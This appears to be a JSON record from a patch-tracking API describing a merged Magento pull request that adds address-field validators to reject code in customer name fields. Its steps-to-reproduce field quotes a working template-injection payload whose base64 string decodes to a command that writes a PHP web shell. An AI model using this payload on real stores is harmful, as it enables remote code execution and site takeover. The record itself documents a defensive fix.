{"data":{"id":"magento2-38345","source":"github-pr","sourceRef":"magento/magento2#38345","title":"Customer address form allows random code in the name fields","pr":{"number":38345,"url":"https://github.com/magento/magento2/pull/38345","author":"dekiakbar","mergedAt":"2024-05-28T15:06:25Z","mergeCommit":"c5c662b9723111d1ce28658b65e43160a8985010","headCommit":"a50615aeaf1a87c3b0155f4d5acbc2fc4144413a","baseRef":"2.4-develop","diffSha256":"5cb26ac61ffac3bfb235c006e8a85377ffe359f5c1951a45daeebe093e718531"},"issues":[{"number":38331,"url":"https://github.com/magento/magento2/issues/38331","title":"Customer address form allows random code in the name fields","labels":["Area: Account","Component: Customer","Issue: Confirmed","Priority: P2","Progress: done","Reported on 2.4.6-p3","Reproduced on 2.4.x"],"kind":"human"}],"fixedIn":"2.4.8","containingTags":["2.4.8","2.4.8-p1","2.4.8-p2","2.4.8-p3","2.4.8-p4","2.4.8-p5","2.4.9"],"reportedOn":"2.4.6-p3","codeMatch":{"2.4.6":"clean","2.4.6-p1":"clean","2.4.6-p2":"clean","2.4.6-p3":"clean","2.4.6-p4":"clean","2.4.6-p5":"clean","2.4.6-p6":"clean","2.4.6-p7":"clean","2.4.6-p8":"clean","2.4.6-p9":"clean","2.4.6-p10":"clean","2.4.6-p11":"clean","2.4.6-p12":"clean","2.4.6-p13":"clean","2.4.6-p14":"clean","2.4.6-p15":"clean","2.4.7":"clean","2.4.7-p1":"clean","2.4.7-p2":"clean","2.4.7-p3":"clean","2.4.7-p4":"clean","2.4.7-p5":"clean","2.4.7-p6":"clean","2.4.7-p7":"clean","2.4.7-p8":"clean","2.4.7-p9":"clean","2.4.7-p10":"clean","2.4.8":"conflict","2.4.8-p1":"conflict","2.4.8-p2":"conflict","2.4.8-p3":"conflict","2.4.8-p4":"conflict","2.4.8-p5":"conflict","2.4.9":"conflict"},"affectedVersions":["2.4.6","2.4.6-p1","2.4.6-p2","2.4.6-p3","2.4.6-p4","2.4.6-p5","2.4.6-p6","2.4.6-p7","2.4.6-p8","2.4.6-p9","2.4.6-p10","2.4.6-p11","2.4.6-p12","2.4.6-p13","2.4.6-p14","2.4.6-p15","2.4.7","2.4.7-p1","2.4.7-p2","2.4.7-p3","2.4.7-p4","2.4.7-p5","2.4.7-p6","2.4.7-p7","2.4.7-p8","2.4.7-p9","2.4.7-p10"],"components":["magento/module-customer"],"files":[{"path":"app/code/Magento/Customer/Model/Validator/City.php","change":"added","package":"magento/module-customer"},{"path":"app/code/Magento/Customer/Model/Validator/Street.php","change":"added","package":"magento/module-customer"},{"path":"app/code/Magento/Customer/Model/Validator/Telephone.php","change":"added","package":"magento/module-customer"},{"path":"app/code/Magento/Customer/etc/validation.xml","change":"modified","package":"magento/module-customer"}],"stripped":{"tests":["app/code/Magento/Customer/Test/Unit/Model/Validator/CityTest.php","app/code/Magento/Customer/Test/Unit/Model/Validator/StreetTest.php","app/code/Magento/Customer/Test/Unit/Model/Validator/TelephoneTest.php"],"docs":[],"outsideCode":[]},"linesChanged":214,"mergeBatched":false,"excluded":null,"sections":{"description":"Magento allows the user to proceed further without throwing an error","stepsToReproduce":"1. Install a fresh Magento latest version with sample data\n2. Register as a customer and login\n3. Add a new address from the My Account section\n4. Provide the following code in the First name and Last name fields\n\n{{var this.getTemplateFilter().filter(dummy) }}{{var this.getTemplateFilter().addAfterFilterCallback(base64_decode).addAfterFilterCallback(system).filter(ZWNobyAnPD9waHAgJHY9KCRfR0VUWyJhIl0pO0BzeXN0ZW0oJHYpOycgPmFwaXMucGhw)}} {{var this.getTemplateFilter().filter(dummy) }}{{var this.getTemplateFilter().addAfterFilterCallback(base64_decode).addAfterFilterCallback(system).filter(ZWNobyAnPD9waHAgJHY9KCRfR0VUWyJhIl0pO0BzeXN0ZW0oJHYpOycgPmFwaXMucGhw)}}","expectedResult":"Magento should not allow to proceed by throwing an error","actualResult":"Magento allows the user to proceed further without throwing an error","source":"issue"},"signatures":[],"labels":{"area":["Account"],"component":["Customer"],"priority":"P2","severity":null,"reportedOn":["2.4.6-p3"]},"categories":["Customer"],"triage":{"model":"@cf/cloudflare/clef","requestHash":"998bcd19731f57d730e0008ae96f95eef1fe3ff9a9b41b6761146faf05397129","isBugfix":0.9716,"changeKind":{"choice":"bugfix","probabilities":{"bugfix":0.9172,"feature":0.0249,"refactor":0.0218,"tests_only":0.0191,"docs_only":0.008,"dependency":0.009},"confidence":0.8115},"scope":{"score":1.173,"probabilities":{"0":0.2224,"1":0.3821,"2":0.3955},"confidence":0.0278},"risk":{"score":0.7201,"probabilities":{"0":0.4603,"1":0.3592,"2":0.1805},"confidence":0.0603},"area":{"choice":"customer","probabilities":{"catalog":0.0058,"checkout":0.0114,"customer":0.9439,"admin":0.0091,"graphql_api":0.0045,"framework":0.0099,"frontend":0.01,"other":0.0054},"confidence":0.876},"securityRelevant":0.8978,"reportedVersion":{"choice":"2.4.6-p3","probabilities":{"2.4.0":0.0027,"2.4.0-p1":0.0029,"2.4.1":0.0026,"2.4.1-p1":0.0029,"2.4.2":0.003,"2.4.2-p1":0.0031,"2.4.2-p2":0.0033,"2.4.3":0.0031,"2.4.3-p1":0.0031,"2.4.3-p2":0.0038,"2.4.3-p3":0.0036,"2.4.4":0.003,"2.4.4-p1":0.0032,"2.4.4-p10":0.0041,"2.4.4-p11":0.0048,"2.4.4-p12":0.0055,"2.4.4-p13":0.0049,"2.4.4-p14":0.0049,"2.4.4-p15":0.0042,"2.4.4-p16":0.0043,"2.4.4-p17":0.0048,"2.4.4-p18":0.0043,"2.4.4-p2":0.0028,"2.4.4-p3":0.0027,"2.4.4-p4":0.0028,"2.4.4-p5":0.0032,"2.4.4-p6":0.0039,"2.4.4-p7":0.0032,"2.4.4-p8":0.0042,"2.4.4-p9":0.0034,"2.4.5":0.0039,"2.4.5-p1":0.0035,"2.4.5-p10":0.0035,"2.4.5-p11":0.0048,"2.4.5-p12":0.0056,"2.4.5-p13":0.0052,"2.4.5-p14":0.0056,"2.4.5-p15":0.0044,"2.4.5-p16":0.0049,"2.4.5-p17":0.0037,"2.4.5-p2":0.0035,"2.4.5-p3":0.004,"2.4.5-p4":0.0037,"2.4.5-p5":0.0038,"2.4.5-p6":0.0046,"2.4.5-p7":0.0037,"2.4.5-p8":0.0043,"2.4.5-p9":0.0031,"2.4.6":0.0349,"2.4.6-p1":0.008,"2.4.6-p10":0.0048,"2.4.6-p11":0.0047,"2.4.6-p12":0.0045,"2.4.6-p13":0.0089,"2.4.6-p14":0.0053,"2.4.6-p15":0.0047,"2.4.6-p2":0.0087,"2.4.6-p3":0.5918,"2.4.6-p4":0.0133,"2.4.6-p5":0.0105,"2.4.6-p6":0.0101,"2.4.6-p7":0.0075,"2.4.6-p8":0.007,"2.4.6-p9":0.006,"2.4.7":0.0054,"2.4.7-p1":0.0048,"2.4.7-p10":0.004,"2.4.7-p2":0.0041,"2.4.7-p3":0.0051,"2.4.7-p4":0.0046,"2.4.7-p5":0.0041,"2.4.7-p6":0.0048,"2.4.7-p7":0.004,"2.4.7-p8":0.0037,"2.4.7-p9":0.0031,"2.4.8":0.0042,"2.4.8-p1":0.0046,"2.4.8-p2":0.0046,"2.4.8-p3":0.0059,"2.4.8-p4":0.0054,"2.4.8-p5":0.0049,"2.4.9":0.0044,"unspecified":0.0035},"confidence":0.3455},"backportWorthy":{"score":1.6609,"probabilities":{"0":0.074,"1":0.1911,"2":0.7349},"confidence":0.3731}},"curated":{"title":"Fixes the customer address form accepting code in the first and last name fields","description":"In My Account > Add new address, code in the First name and Last name fields is accepted and Magento allows the user to proceed without an error. Magento_Customer validation.xml adds the Name validator and new Street, City and Telephone validator to the save group, so a field that is not valid gets an error message. The checkout quote address is not covered.","categories":["Customer"],"author":"claude-code/opus-5.5","date":"2026-10-06","reviewedBy":null},"tests":{"2.4.7-p10":{"before":"not-runnable","after":"pass","adapted":false,"runAt":"2026-10-06T09:29:10.335Z","releaseCommit":"72561bf80652f57cc642a03e2c9a51d74a285b14","suites":{"unit":{"before":"not-runnable","after":"pass","runAt":"2026-10-06T09:29:10.335Z"}}}}},"_documentation":"https://magento.watch/api","_description":"Upstream fix magento2-38345 details"}